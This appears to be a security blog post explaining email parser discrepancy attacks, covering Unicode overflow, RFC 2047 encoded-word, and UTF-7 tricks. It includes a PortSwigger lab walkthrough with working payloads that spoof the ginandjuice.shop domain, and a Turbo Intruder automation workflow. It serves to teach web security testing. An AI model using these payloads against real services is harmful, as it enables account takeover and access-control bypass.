Business logic vulnerabilities: email address parser discrepancies
1. Introduction
While learning about business logic vulnerabilities in PortSwigger’s labs, I came across an interesting exploit: bypassing access controls by manipulating email parsers. This bug fascinated me because it shows how small inconsistencies in how systems parse email addresses can lead to serious security flaws.
In this post, I’ll break down how this vulnerability works, demonstrate it with a simple PortSwigger lab example, and explain its real-world impact. By the end, you’ll understand why email parsing discrepancies matter and how attackers can exploit them to gain unauthorized access.
2. Parser discrepancies
2.1 Unicode overflows
Many security systems block special characters (like @, ‘, “, or ;) in email fields to prevent injection attacks. However, attackers can bypass these filters by using Unicode characters that overflow into blocked ASCII characters when parsed.
Example:
Some functions (like PHP’s chr()) reduce a code point to the 0-255 range using a modulo 256 operation, so a high Unicode value can collapse into a standard ASCII character.
chr(0x100 + 0x40) → chr(256 + 64) → chr(64) → '@'
Examples:
'✨' === '('
'✩' === ')'
'✻' === ';'
'✼' === '<'
'✽' === '='
'✾' === '>'
'❀' === '@'
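The mapping above can be reproduced with a short Python sketch. Python's own chr() does not wrap around, so the modulo 256 step is applied explicitly here to mimic the behaviour described for PHP's chr(). The helper name overflow_to_ascii is only illustrative.

```python
def overflow_to_ascii(ch):
    """Mimic a byte-wide chr(): keep only the low 8 bits of the code point."""
    return chr(ord(ch) % 256)


# Characters from the list above and the ASCII symbol each one collapses to.
for ch in "✨✩✻✼✽✾❀":
    print(f"U+{ord(ch):04X} {ch} -> {overflow_to_ascii(ch)!r}")
```

A filter that only rejects the literal "@" would let "❀" (U+2740) through, because 0x2740 modulo 256 is 0x40.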
Conclusion
Unicode overflows expose a critical flaw: security filters often check for literal characters but miss their Unicode-encoded equivalents. Attackers exploit this by submitting high-code-point characters that normalize into blocked symbols (@, ‘, etc.), bypassing access controls.
2.2 Encoded-word
The encoded-word syntax from RFC 2047 is primarily used in email headers (Subject, From, To) to encode non-ASCII characters.
The whitepaper by Gareth Heyes illustrates the syntax with an encoded email address, which breaks down as follows:
- “=?” indicates the start of an encoded-word.
- The charset comes next, in this case UTF-8.
- The encoding type sits between two “?” characters: ?q? selects Q-Encoding.
- Q-Encoding is simply hex with an equals-sign prefix: =41=42=43 decodes to ABC.
- “?=” indicates the end of the encoded-word.
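The breakdown above can be turned into a minimal decoder. This is a sketch that handles only Q-Encoding and is not a full RFC 2047 implementation; the function names and the example.com address are assumptions made for illustration.

```python
import re

# =?charset?q?payload?=  (only Q-encoding is handled in this sketch)
ENCODED_WORD = re.compile(r"=\?([^?]+)\?[qQ]\?([^?]*)\?=")


def q_decode(payload):
    """Turn =XX hex escapes into raw bytes; '_' stands for a space in Q-encoding."""
    raw = payload.replace("_", " ").encode("ascii")
    return re.sub(rb"=([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), raw)


def decode_encoded_words(value):
    """Replace every encoded-word in value with its decoded text."""
    def repl(m):
        charset, payload = m.group(1), m.group(2)
        return q_decode(payload).decode(charset)
    return ENCODED_WORD.sub(repl, value)


print(decode_encoded_words("=?utf-8?q?=41=42=43?=@example.com"))  # ABC@example.com
```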
Methodology/Tooling
Let’s talk about the charset:
- We can use the charset “x” to reduce the size of the probe, but some systems reject unknown charsets, so the probe would fail against them.
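Whether a probe with the charset “x” survives depends on how the decoder treats unknown names. The sketch below uses Python's codec registry as a stand-in for a strict decoder. It says nothing about how a particular target behaves, and charset_is_known is a hypothetical helper.

```python
import codecs


def charset_is_known(name):
    """Return True if Python has a codec registered under this charset name."""
    try:
        codecs.lookup(name)
        return True
    except LookupError:
        return False


for name in ("x", "utf-8", "utf-7", "iso-8859-1"):
    print(name, charset_is_known(name))
```

A strict decoder of this kind would reject the “x” probe outright, which is why it is worth repeating the test with a valid charset.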
GitHub Email Parser Exploit Bypassing Cloudflare Zero Trust (just using unknown charsets)
A critical vulnerability in GitHub’s email verification allowed attackers to bypass Cloudflare Zero Trust by exploiting RFC 2047 “encoded-word” parsing. The malicious email address combined three encoded characters:
=40 (encoded @) to split domains
=3e (encoded >) to terminate SMTP commands
=00 (null byte) to truncate validation
Root cause: GitHub’s Ruby-based parser decoded the encoded-word but failed to sanitize control characters, so the null-byte payload was processed.
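To make the effect of those three characters concrete, here is a rough sketch of what a lenient decoder would produce. The addresses (evil.example, victim.example) are hypothetical, and treating each decoded byte as one character is an assumed fallback for the unknown charset “x”, not GitHub's actual logic.

```python
import re


def q_decode(payload):
    """Decode =XX escapes, mapping each byte to one character (assumed fallback)."""
    return re.sub(r"=([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1), 16)), payload)


# Hypothetical probe: attacker-controlled mailbox hidden inside the encoded-word.
probe = "=?x?q?attacker=40evil.example=3e=00?=foo@victim.example"

# A validator looking only at the raw string sees the allowed domain.
print(probe.endswith("@victim.example"))  # True

# A decoder that expands the encoded-word produces '@', '>' and a null byte.
end = probe.index("?=")
decoded = q_decode(probe[len("=?x?q?"):end]) + probe[end + 2:]
print(repr(decoded))  # 'attacker@evil.example>\x00foo@victim.example'

# Assumed downstream behaviour: everything after '>' or the null byte is dropped.
effective = re.split(r"[>\x00]", decoded)[0]
print(effective)  # attacker@evil.example
```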
Proof of Concept (PoC) by Researcher Gareth Heyes
Security researcher Gareth Heyes successfully demonstrated how to verify unauthorized email domains on GitHub, including microsoft.com, mozilla.com, github.com …
- charset “UTF-7”, “UTF-8”
Example with UTF-7: Ruby’s Mail Gem
Ruby’s Mail gem (508M+ downloads) auto-decoded UTF-7 in emails, enabling email parser bypasses. This allowed attackers to hide malicious characters in seemingly “safe” input.
- charset “iso-8859-1”
ISO-8859-1 Exploit in GitLab Enterprise Servers
GitLab’s parser auto-decoded ISO-8859-1 but failed to normalize the output, allowing control characters to slip through. The exploit is very similar to the GitHub one, but it required a valid charset and a space instead of a null byte. The diagram uses “x”, but a real attack would use “iso-8859-1”. Unlike GitHub’s null-byte trick, this relied on spaces/underscores to confuse validation.
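The underscore matters because RFC 2047 Q-encoding treats “_” as an encoded space. A small sketch using Python's standard email.header.decode_header shows the decoded result. The probe and its domains are hypothetical, and Python's decoder only stands in for whatever parser a target uses.

```python
from email.header import decode_header

# Hypothetical probe: '_' inside a Q-encoded word is decoded as a space.
probe = "=?iso-8859-1?q?attacker=40evil.example_?=@victim.example"

parts = []
for chunk, charset in decode_header(probe):
    # decode_header can yield bytes or str, so both cases are handled
    if isinstance(chunk, bytes):
        chunk = chunk.decode(charset or "ascii")
    parts.append(chunk)

decoded = "".join(parts)
print(repr(decoded))
```

The raw string still ends in the trusted domain, while the decoded value contains a space that separates the attacker's address from the rest.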
Impact: Unauthorized access to GitLab Enterprise instances using domain whitelisting. IdP compromise when GitLab served as an identity provider.
3. Hands-On Practice in a PortSwigger lab
Bypassing Access Controls via Email Address Parsing Discrepancies:
To access the admin panel, you must have an email address with the domain ginandjuice.shop.
Investigate encoding discrepancies:
I tested the charset “x” (an unknown charset), the charset “iso-8859-1”, and also utf-8. In each case the registration is blocked with the error: “Registration blocked for security reasons.”
=?x?q?=61=62=63?=test@ginandjuice.shop
=?iso-8859-1?q?=61=62=63?=test@ginandjuice.shop
=?utf-8?q?=61=62=63?=test@ginandjuice.shop
But when I test the charset “utf-7”, the registration is not blocked:
=?utf-7?q?&AGYAbwBvAGIAYQBy-?=@ginandjuice.shop
(UTF-7 encoded "foobar" -> foobar@ginandjuice.shop)
Now we can use this to craft an attack that tricks the server into sending the confirmation email to an address on our exploit server while still appearing to satisfy the ginandjuice.shop domain requirement.
@ -> &AEA-
Space -> &ACA-
Null -> &AAA-
Underscore -> &AF8-
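These blocks are the base64 form of each character's UTF-16BE bytes, wrapped in a shift character and a closing “-”. The sketch below regenerates the table under that assumption. The “&” shift character is taken from the payloads in this post (standard UTF-7 as defined in RFC 2152 uses “+”), and utf7_shift is a hypothetical helper name.

```python
import base64


def utf7_shift(ch, shift="&"):
    """Encode one character as shift + base64(UTF-16BE bytes, padding stripped) + '-'."""
    b64 = base64.b64encode(ch.encode("utf-16-be")).decode("ascii").rstrip("=")
    return f"{shift}{b64}-"


for label, ch in [("@", "@"), ("Space", " "), ("Null", "\x00"), ("Underscore", "_")]:
    print(f"{label} -> {utf7_shift(ch)}")
```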
Through extensive testing, I found that encoding spaces was the most effective approach for forcing parser inconsistencies.
=?utf-7?q?attacker&AEA-myemail.net&ACA-?=@ginandjuice.shop
(result: =?utf-7?q?attacker@myemail.net ?=@ginandjuice.shop)
In the email client, I receive a registration validation email. This is because the encoded email address passed validation thanks to the @ginandjuice.shop portion at the end, while the email server interpreted the registration address as attacker@myemail.net.
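The discrepancy can be simulated in a few lines. This is only a sketch: the validator and mailer behaviours are assumptions made for illustration, not the lab's actual code, and decode_shifted_blocks is a hypothetical helper that expands the &...- blocks as base64-encoded UTF-16BE.

```python
import base64
import re


def decode_shifted_blocks(text):
    """Expand &<base64>- blocks (base64 of UTF-16BE bytes) back into characters."""
    def repl(m):
        b64 = m.group(1)
        b64 += "=" * (-len(b64) % 4)  # restore the stripped padding
        return base64.b64decode(b64).decode("utf-16-be")
    return re.sub(r"&([A-Za-z0-9+/]+)-", repl, text)


raw = "=?utf-7?q?attacker&AEA-myemail.net&ACA-?=@ginandjuice.shop"

# Step 1: a validator that only inspects the raw string is satisfied.
print(raw.endswith("@ginandjuice.shop"))  # True

# Step 2: a component that expands the encoded-word sees a different address.
inner = re.fullmatch(r"=\?utf-7\?q\?(.*?)\?=(.*)", raw)
decoded = decode_shifted_blocks(inner.group(1)) + inner.group(2)
print(repr(decoded))  # 'attacker@myemail.net @ginandjuice.shop'

# Step 3: assumed mailer behaviour, where the recipient ends at the first space.
print(decoded.split(" ")[0])  # attacker@myemail.net
```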
Automate exploitation of encoded-word with Turbo Intruder:
- First, I replace the value of the email parameter with %s.
- The script I use for fuzzing: turbo-intruder-scripts.
- If you encounter applications with rate limits, change the REQUEST_SLEEP variable to play nicely with those servers.
- Change the validServer variable to the target domain you want to spoof.
- Set shouldUrlEncode = True.
That variable is the only thing you need to change to use the script, and the script can easily be customised to perform other attacks.
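To give an idea of what such a fuzzing run sends, here is a standalone sketch that builds a small list of probes. It is not the turbo-intruder-scripts code and does not run inside Burp. Only the names validServer and shouldUrlEncode come from the post; the attacker address, the charset list, the separator lists and build_probes are assumptions.

```python
from urllib.parse import quote

validServer = "ginandjuice.shop"       # target domain to spoof (name from the post)
shouldUrlEncode = True                 # name from the post
collaborator = "attacker@myemail.net"  # hypothetical attacker-controlled mailbox

CHARSETS = ["x", "utf-8", "utf-7", "iso-8859-1"]
# Separators placed after the attacker address: space, null, underscore.
SEPARATORS_Q = ["=20", "=00", "_"]
SEPARATORS_UTF7 = ["&ACA-", "&AAA-", "&AF8-"]


def build_probes(attacker, domain):
    """Build one probe per charset and separator combination."""
    user, host = attacker.split("@")
    probes = []
    for charset in CHARSETS:
        utf7 = charset == "utf-7"
        at = "&AEA-" if utf7 else "=40"
        for sep in (SEPARATORS_UTF7 if utf7 else SEPARATORS_Q):
            probe = f"=?{charset}?q?{user}{at}{host}{sep}?=@{domain}"
            probes.append(quote(probe, safe="") if shouldUrlEncode else probe)
    return probes


for p in build_probes(collaborator, validServer):
    print(p)
```

Each printed line is a value that would take the place of %s in the request.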
If the attack works you should receive a collaborator interaction within Turbo Intruder. This means the email domain is spoofable.
I sort the results by word count and get a valid response:
4. References & Resources
- Whitepaper by Gareth Heyes of the PortSwigger Research team : Link.
- lab for practice : Link.
- tools for fuzzing : Link.
- Turbo Intruder.